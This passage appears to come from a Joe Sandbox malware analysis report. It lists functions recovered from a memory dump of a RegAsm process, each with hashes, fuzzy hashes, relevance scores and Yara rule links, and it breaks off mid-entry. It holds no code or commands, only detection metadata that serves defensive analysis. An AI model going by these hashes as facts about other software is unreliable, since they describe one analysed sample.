Opcode ID: 06e69945bbbc32c6b94e8ce590409ec5fe0ac56eb36e5ded30fd847ebde29e2f
Instruction ID: b1263bc9a2dc22f19eae588eb7e14b86425fedde64f4c75ae3fe46388b6acd42
Opcode Fuzzy Hash: 06e69945bbbc32c6b94e8ce590409ec5fe0ac56eb36e5ded30fd847ebde29e2f
Instruction Fuzzy Hash: 484221B6604B408FD314DF39C881396BBE2AF95324F188A3ED4EA873D2D679E545C706

Function 00403000 Relevance: .7, Instructions: 657COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39063f267de1c4b7ad7c4dae0f3436c6d00b5b9179a226d4e1be1e4f4f8738be
Instruction ID: 4e28846944d9b9754a605a752725904b1291ac6593cab4844305b3da65c5695c
Opcode Fuzzy Hash: 39063f267de1c4b7ad7c4dae0f3436c6d00b5b9179a226d4e1be1e4f4f8738be
Instruction Fuzzy Hash: 7552F3715083458FCB14CF14C0806AABFE5FF89315F188A7EE8996B381D779EA45CB85

Function 00403A00 Relevance: .6, Instructions: 612COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51c62d17d7bb05d5de954ce49dfd90a2b4f1e008ea99c39d9e2a4dfea3081382
Instruction ID: bbf830faefe05a66a3f631b3cfe5d67432049638bb9efd6fae58d51ecb657e1a
Opcode Fuzzy Hash: 51c62d17d7bb05d5de954ce49dfd90a2b4f1e008ea99c39d9e2a4dfea3081382
Instruction Fuzzy Hash: F2423570614B108FC328CF29C690526BBF5BF85711B604A2ED6A7A7F90D73AF945CB18

Function 004387D9 Relevance: .5, Instructions: 451COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd2b8edaba0b16cac981fe0e449f8a893ef11d91ea58cf197ca059c3c8e7a890
Instruction ID: b2e877d00717ff25c9d0cdf54ac59cf96d3daedb059da32ca74639cf0e13a762
Opcode Fuzzy Hash: fd2b8edaba0b16cac981fe0e449f8a893ef11d91ea58cf197ca059c3c8e7a890
Instruction Fuzzy Hash: 82E1E33A618251CBCB189F34DC6126FB3F1FF8A741F4AC87DD4814B2A0EB7989558719

Function 00415CF0 Relevance: .4, Instructions: 439COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6bfe11bbba7880596110cd3d0ed332b5391810c2bc8e1f1edbb054a16af868e
Instruction ID: 6d9435354fc659822b6b1c5efb65b573953b447e71d6b6fc806ce2498ffa505a
Opcode Fuzzy Hash: d6bfe11bbba7880596110cd3d0ed332b5391810c2bc8e1f1edbb054a16af868e
Instruction Fuzzy Hash: 0AC18976A04210DBD7149F24DC526BB73A1FFC6314F49867EE886873D2EB789840CB99

Function 00410350 Relevance: .4, Instructions: 437COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 871298f33cedaf8d0dfb85d7f7ede5c9b14abb7da89fdc9f5af32d7b407b6942
Instruction ID: 12ebd0fc736d61d80e699b0513100db6d3952b99fad975810d5883e1356eb7c2
Opcode Fuzzy Hash: 871298f33cedaf8d0dfb85d7f7ede5c9b14abb7da89fdc9f5af32d7b407b6942
Instruction Fuzzy Hash: B6025EF0914B00AFC361EF39C946797BEE8EB06350F544A2EE4EED7281D33561558BA2

Function 0041FE65 Relevance: .4, Instructions: 437COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4758351b8a516b6a295e2be796932b50c96336487c6d3062516ac1fc9f6f57f6
Instruction ID: e3fb6e92fc8b8db6ccd84f214ece3e6bd99e3baf60e064826f2615626e2216ec
Opcode Fuzzy Hash: 4758351b8a516b6a295e2be796932b50c96336487c6d3062516ac1fc9f6f57f6
Instruction Fuzzy Hash: 8F126E61508BC28ED326CA3C8848256BF916B67228F2CC7DDD4F94F7D3D226D54787A2

Function 004226E0 Relevance: .4, Instructions: 430COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64b4c5f6c62b416fb1a75d9559e36c1b752f7bd78b5492a3c7c32c448cfb96e8
Instruction ID: c0dbe47efb8bcef047ca95647b8ee50871298b34e65b0dcfbff01b59ab06d4c1
Opcode Fuzzy Hash: 64b4c5f6c62b416fb1a75d9559e36c1b752f7bd78b5492a3c7c32c448cfb96e8
Instruction Fuzzy Hash: 4DB14772708320ABD7209F24D88276B73E1EF91354F48852EE88597382E7BCDD05C35A

Function 00406060 Relevance: .4, Instructions: 412COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd048da104e7af8007c6209783951a82458fe7aab1e77b47bccf8558549eefb4
Instruction ID: fae4060d9db7d55d87c9472cf8f89766852e445f2b72dac90175b2677de88789
Opcode Fuzzy Hash: cd048da104e7af8007c6209783951a82458fe7aab1e77b47bccf8558549eefb4
Instruction Fuzzy Hash: 75E19D752083419FC324CF29C980A2BFBE2EFD9300F49882DE4C697791D679E958CB56

Function 00406C20 Relevance: .4, Instructions: 407COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9bd4b11cb74b99a955bedecc09cfe0cf72419903794a84c01a140c1c4ff93d7b
Instruction ID: 139d79b94db1103b0ae30691eeb675cd7edfff798b979738aaa78bfc7e15cd90
Opcode Fuzzy Hash: 9bd4b11cb74b99a955bedecc09cfe0cf72419903794a84c01a140c1c4ff93d7b
Instruction Fuzzy Hash: 3FF1A376B587418FC728CF24C8517ABB7E2EBC5304F18897ED59AC7381EA38A506CB05

Function 00446F10 Relevance: .4, Instructions: 380COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1898eb585d4013fb0e25b6a61c07807cd63bead9a04b14102d120b7b62861cd3
Instruction ID: 75d52fff770b993a7f31247093c836f93164eb086eedda6d29a7b5d30f5252dd
Opcode Fuzzy Hash: 1898eb585d4013fb0e25b6a61c07807cd63bead9a04b14102d120b7b62861cd3
Instruction Fuzzy Hash: F4C1C63549D3809FD706CF3488AA9C57FB0EF6722431A8ADEC8C14F967D61AA54BDB01

Function 004097D0 Relevance: .4, Instructions: 380COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4da277e0c7250d72923aca53da87e043c53f7eed759d3a00a3fd14eded65e5b
Instruction ID: f5fd121f61af663098620efadc71f25641bc94836af86c03945d901314238e59
Opcode Fuzzy Hash: c4da277e0c7250d72923aca53da87e043c53f7eed759d3a00a3fd14eded65e5b
Instruction Fuzzy Hash: 35D12971A083514BC315CE29D4D026AF7A2BFC1320F69862EE4E15B3E7E738AD05CB85

Function 004207DD Relevance: .4, Instructions: 380COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7cbb7439140ec995c438c591106f6f34f479cd71e8720003cb11446cc9db802
Instruction ID: e97f4136eee5e6de7c047ab25e73142b7a2da3431f0f941e354625907cea4a84
Opcode Fuzzy Hash: e7cbb7439140ec995c438c591106f6f34f479cd71e8720003cb11446cc9db802
Instruction Fuzzy Hash: 69025C61508BC28ED3268A3C8848616BF916B67228F2CC7DDD0F94F7D3D266C547C7A2

Function 0042DA53 Relevance: .4, Instructions: 375COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9db1201d9149a62ca0de21218b7655b4ca3c7981cef48557e1a130a469043101
Instruction ID: abefc85342a2f799530a58ca1021d9556f0508a951a5a7cbbe6dae06d6246bb6
Opcode Fuzzy Hash: 9db1201d9149a62ca0de21218b7655b4ca3c7981cef48557e1a130a469043101
Instruction Fuzzy Hash: B7B1D570A04B408FD7358F39D490773BBE2AF96304F68499ED4EB87392C739A5098B65

Function 0042B644 Relevance: .4, Instructions: 362COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 351450154bebe4794fa8a447e737246ff53a1132c75dee26380fc5d22ce491c3
Instruction ID: f0a772605673e8087228de3f41f3aea7f39d2a3da6c6d25486c1c1a02d6f7111
Opcode Fuzzy Hash: 351450154bebe4794fa8a447e737246ff53a1132c75dee26380fc5d22ce491c3
Instruction Fuzzy Hash: 13B11671745B528BD3248A29D8A0273F7A2EF95320768871EC8A7077E1D338F846D7D9

Function 00427190 Relevance: .4, Instructions: 356COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 159b4b3251719021a6de96c33f92aaead382ef4302a1655b92000d13146cc875
Instruction ID: ce8110a25c28626bf9356651e3761c05ead08f9f4c2c32ce75843816d5945f3a
Opcode Fuzzy Hash: 159b4b3251719021a6de96c33f92aaead382ef4302a1655b92000d13146cc875
Instruction Fuzzy Hash: 85B127B6E08265CBCB14CF64E8916EEB7B1EF46304F1900BAD842A7342D7399D06CB59

Function 00430700 Relevance: .3, Instructions: 283COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8889fb5689d09e1d847cda5997aaff441cb87be729cffad5057276a5e37ec79
Instruction ID: ab5f367f057af7da4acb3ded83cfb2012cc3e7aa71659a1ce3f1d9dde4f34f7e
Opcode Fuzzy Hash: d8889fb5689d09e1d847cda5997aaff441cb87be729cffad5057276a5e37ec79
Instruction Fuzzy Hash: DDB13772709B808FD3199B38C8A136ABBE2AFDA304F1C857DC5CA87753D539A405CB46

Function 0042F0A7 Relevance: .3, Instructions: 282COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eaae6cca9e44ef66b4ae327e3d3fea4d8bfee18e0e9517063924ef2da8cb8c23
Instruction ID: 3763d3a53211557d2d7e14f1a9cc940818b1eef24e899a11069ecdb3fa0dbc7e
Opcode Fuzzy Hash: eaae6cca9e44ef66b4ae327e3d3fea4d8bfee18e0e9517063924ef2da8cb8c23
Instruction Fuzzy Hash: D0B15672704B808FD3198F38D89136ABBE2AFD6304F5C897DC9CA87352D639A805C742

Function 004302FA Relevance: .3, Instructions: 282COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e32b414e316dd49aa3e75c2106e1aaf8227c9b28207bcc075f38aa1c87d224c0
Instruction ID: 047c683e6986010d0481c075b2e8e85f5e50be9c290ec6addbea03d367f712c6
Opcode Fuzzy Hash: e32b414e316dd49aa3e75c2106e1aaf8227c9b28207bcc075f38aa1c87d224c0
Instruction Fuzzy Hash: E0B13975604B808FD315CF38D8A13AABFE2AF9A304F1D896DC5D78B752C679A406CB11

Function 00440120 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 542c3bf3d0d321e3338f2d6cecc1510e136f1aa7acf8c23c5170be10ed024a81
Instruction ID: 4a38b7ddc69e5f8755b080ab226cdc023b083bac70ef50ea7a5be8e41e8b1174
Opcode Fuzzy Hash: 542c3bf3d0d321e3338f2d6cecc1510e136f1aa7acf8c23c5170be10ed024a81
Instruction Fuzzy Hash: FB81F5326083119FD724CF18C891A6BB7E1FF94304F19856EEA854B3A1DB7ADC61C786

Function 0043FE30 Relevance: .3, Instructions: 279COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a83a083ce0a46c7ece837732c3e631063a26406e76af4151202a62b692da4cfd
Instruction ID: 4b9bd627a21f1111da1deb77b8888b071bccee2dcdc358835260d1cf0db95c2c
Opcode Fuzzy Hash: a83a083ce0a46c7ece837732c3e631063a26406e76af4151202a62b692da4cfd
Instruction Fuzzy Hash: 7881E4356083019FD714DF18D891A6BB7E2FF99700F19852EEA858B365DB36EC10CB86

Function 0043B400 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24653ae588dbd9055458789e5398d27aa3e726b34a7183bcf247594a95a7d692
Instruction ID: 3b8deba626284897da840761c4b5f9073ec669cd1915512bb617847b168bcd3d
Opcode Fuzzy Hash: 24653ae588dbd9055458789e5398d27aa3e726b34a7183bcf247594a95a7d692
Instruction Fuzzy Hash: C3A1C07160C3818FC315CF28C49062BBBE2EBD9314F19866EE9D58B352D739D806CB96

Function 00428FC0 Relevance: .2, Instructions: 235COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed3e096525a9a41aaa86b0385687fb0eba5ce8e574b027f83835b0eac424ac74
Instruction ID: 0b105094016f4619f679deb4bca00c7f3291739e1616cf78d10af62879fe8537
Opcode Fuzzy Hash: ed3e096525a9a41aaa86b0385687fb0eba5ce8e574b027f83835b0eac424ac74
Instruction Fuzzy Hash: 4B812571A01325CFCB24CF59C8917ABB7B1FF56320F188549D482AB795E378AC41CB59

Function 0041E440 Relevance: .2, Instructions: 228COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fec4681b639584651e5d6a68483ea33a5b4467c9018a8b15619f3c9fc2eccdd
Instruction ID: bfe20b0132690a9f427c6b6e9a86d3fbb327015973a1851f0c64f54db438f77b
Opcode Fuzzy Hash: 2fec4681b639584651e5d6a68483ea33a5b4467c9018a8b15619f3c9fc2eccdd
Instruction Fuzzy Hash: 02716B3A709AC04BD3288A3D4C512AA7A934BE7334F6CC77EE9F18B3D5D55988828305

Function 0042934D Relevance: .2, Instructions: 214COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a634e6d577611700c4195b90c047f68093062b733c443c9b91ec3e26333c3a4
Instruction ID: 76fba63edf1146fcfd7297e3b8bd1638ac06d60d1fa1a5a85fb8a83bc94dd2ef
Opcode Fuzzy Hash: 2a634e6d577611700c4195b90c047f68093062b733c443c9b91ec3e26333c3a4
Instruction Fuzzy Hash: 966104B1E002149FDB18EF7DC94635E7FB1EB85300F5581ADE849AB38AD73488068BD6

Function 00447055 Relevance: .2, Instructions: 213COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ac83c350838f802ea3636146f559b7e2aeb2133057561b9192372f44b50b8c9
Instruction ID: 26cd99a86ef6339889d8a82ac686308a7f73a783a24918ea87b711f149d537dc
Opcode Fuzzy Hash: 1ac83c350838f802ea3636146f559b7e2aeb2133057561b9192372f44b50b8c9
Instruction Fuzzy Hash: FF71B13949D3C19FD702DF3588BA8827FB0AE6731435989DECCC04A067D216A25BDB11

Function 004023B0 Relevance: .2, Instructions: 199COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66498b867d3b622f9b69cb8bb0614eca35c6f53f5778fcf8d5e705b4363a0a4b
Instruction ID: f1a63935ac926f48b740848bb22276d3eacb0b24e298e8b0ab6ef794c8a9904c
Opcode Fuzzy Hash: 66498b867d3b622f9b69cb8bb0614eca35c6f53f5778fcf8d5e705b4363a0a4b
Instruction Fuzzy Hash: 26616EB0804701ABD7109F28ED49707BBA4FF81329F14473DE566962E1D375E924CB8A

Function 004295AA Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3e997237db1c706651fde207e6e789d29d304285b154e58fc0e3bffff9ce9ba
Instruction ID: 2bc670e75e8958f1bd58415e774a124f81b1d2374e2b879eabf0cff4b44613cd
Opcode Fuzzy Hash: f3e997237db1c706651fde207e6e789d29d304285b154e58fc0e3bffff9ce9ba
Instruction Fuzzy Hash: 1D61D4B5E04225CFDB19CF68D85069EBBB2FB86310F15826DD855AB785CB789C02CF90

Function 0041E7A0 Relevance: .2, Instructions: 196COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f6e7e51327246eb44546b0ba9072f70d77ef873ff8eccde5ef59e68da9b3788
Instruction ID: 0f7c9ff4711b432d334fc6ec2ae45eab43711e6f2e0a5296c732f9b1b46355e7
Opcode Fuzzy Hash: 1f6e7e51327246eb44546b0ba9072f70d77ef873ff8eccde5ef59e68da9b3788
Instruction Fuzzy Hash: 7951253B6599814BD3289D3E4C513E66A834FD3330B2C877BEAB6873E1D5AD48425309

Function 00436E90 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d7870ff978f0552d92d13cb2eced5db31d90ee0d29bfad68c276683313256f5
Instruction ID: ca73032961d695a19136ea63bb2bd9092770d6acfd6f682f5572dfc35faf7d67
Opcode Fuzzy Hash: 8d7870ff978f0552d92d13cb2eced5db31d90ee0d29bfad68c276683313256f5
Instruction Fuzzy Hash: BC517DB15087549FE314DF29D49435BBBE1BBC8318F054A2EE4E987390E379DA088F86

Function 0043829A Relevance: .2, Instructions: 177COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21be6e246412111ab674f86c1b8846c6894ba9873c874c6b4fe184aa50ab5f96
Instruction ID: 64e452e441810cf95419960d2626386b98f8c1324bd4c194e0f1859678c0b50f
Opcode Fuzzy Hash: 21be6e246412111ab674f86c1b8846c6894ba9873c874c6b4fe184aa50ab5f96
Instruction Fuzzy Hash: D5512235A00209CFDB04CF69D8A57AFB3B1FB89304F10946DE545AB380DB7A9812CB95

Function 004240AC Relevance: .2, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 532a52ac3440e7430a80eacc81148da425f3776408971032e6f4821853b3ed0f
Instruction ID: 18b4a5d6037f89d9cd6cd1cc1c4439f5a8f28d4cadc982b0a9bf31f926dfb400
Opcode Fuzzy Hash: 532a52ac3440e7430a80eacc81148da425f3776408971032e6f4821853b3ed0f
Instruction Fuzzy Hash: DA5154B5A04311CFE720CF18EC80B6BBBB1FB89314F51457DE9169B391C7B1A9028B91

Function 0043A620 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c9740dd06a8ff6c5a796d76c3fdd0def922af58cda2cc90c03b3f618db6d29b
Instruction ID: cfb6a53ae9fb4c2a178a8286c452cc7d1eacb3c3ec2c940d0ef893cbd2bdb07f
Opcode Fuzzy Hash: 3c9740dd06a8ff6c5a796d76c3fdd0def922af58cda2cc90c03b3f618db6d29b
Instruction Fuzzy Hash: 9E412032A493109FD320CE68D88474BB7E6EBC9314F19D92ED8C49B245D779CC0587D2

Function 004235E2 Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8442a1e31841ae74b9b34e20ee1745e87dba9b9308409758932207c3091c1652
Instruction ID: bc12eeb4670cd51645dc69605ddfc39387af881fde27b1891517681bd8eec28c
Opcode Fuzzy Hash: 8442a1e31841ae74b9b34e20ee1745e87dba9b9308409758932207c3091c1652
Instruction Fuzzy Hash: A9510F75B09202DBE718CF28E85072AB3A2FF8A300F4AC57DD48697295D739E921CB45

Function 0040E358 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2185492531eb77c8ddcf5ee2b83869319f9ee80a4e1d65d4c0ee5b6d58214d0c
Instruction ID: 79a74b8f7a97a7f6b7b1bf59813dc322d3b9f9744d213e5f61318a847773a2b4
Opcode Fuzzy Hash: 2185492531eb77c8ddcf5ee2b83869319f9ee80a4e1d65d4c0ee5b6d58214d0c
Instruction Fuzzy Hash: CA314C395082108AD328EB16D89197FB351FF91354F54893ED886377D2CF399C128BCA

Function 00424350 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdac737ffc7d530ca6a1b1f0d26bc34ae8d7f238a6fe47038b92f30b3c58483c
Instruction ID: 1f0bcae78e99a2d1062d0cc95e3258c21eac01cfa68904b07efbac8384d0ffe2
Opcode Fuzzy Hash: cdac737ffc7d530ca6a1b1f0d26bc34ae8d7f238a6fe47038b92f30b3c58483c
Instruction Fuzzy Hash: 88317876A083045BE73CCF20DC42BEFB7D5EB85308F06053EEA8AD7291DAB551018B86

Function 00427468 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7f0081b3fe9945cba749ddb8aefad3737bb974d1cf9ad4e829a6ab9f5608f57
Instruction ID: 34f784d3710883debd1bd8331f41c94dca5b323256f3a2f52c6289e87142d67f
Opcode Fuzzy Hash: f7f0081b3fe9945cba749ddb8aefad3737bb974d1cf9ad4e829a6ab9f5608f57
Instruction Fuzzy Hash: 9A41B0B9D00269DFDB048F95EC52B9AF7B4FF4A314F164069E500BB391C778A980CB99

Function 00401F10 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a35f7188e43e38ba29a110e261279b9a8b62e1601de4d265dabd1d07830f63b
Instruction ID: 78cb4faa5bad25a5ad6b2c536841b839b4e325b6634d93533be549190b54d150
Opcode Fuzzy Hash: 1a35f7188e43e38ba29a110e261279b9a8b62e1601de4d265dabd1d07830f63b
Instruction Fuzzy Hash: 62318B316082029FD7149E59C880927B7E1EF84358F14497EF899A73E1D739DC52C74A

Function 004375F0 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

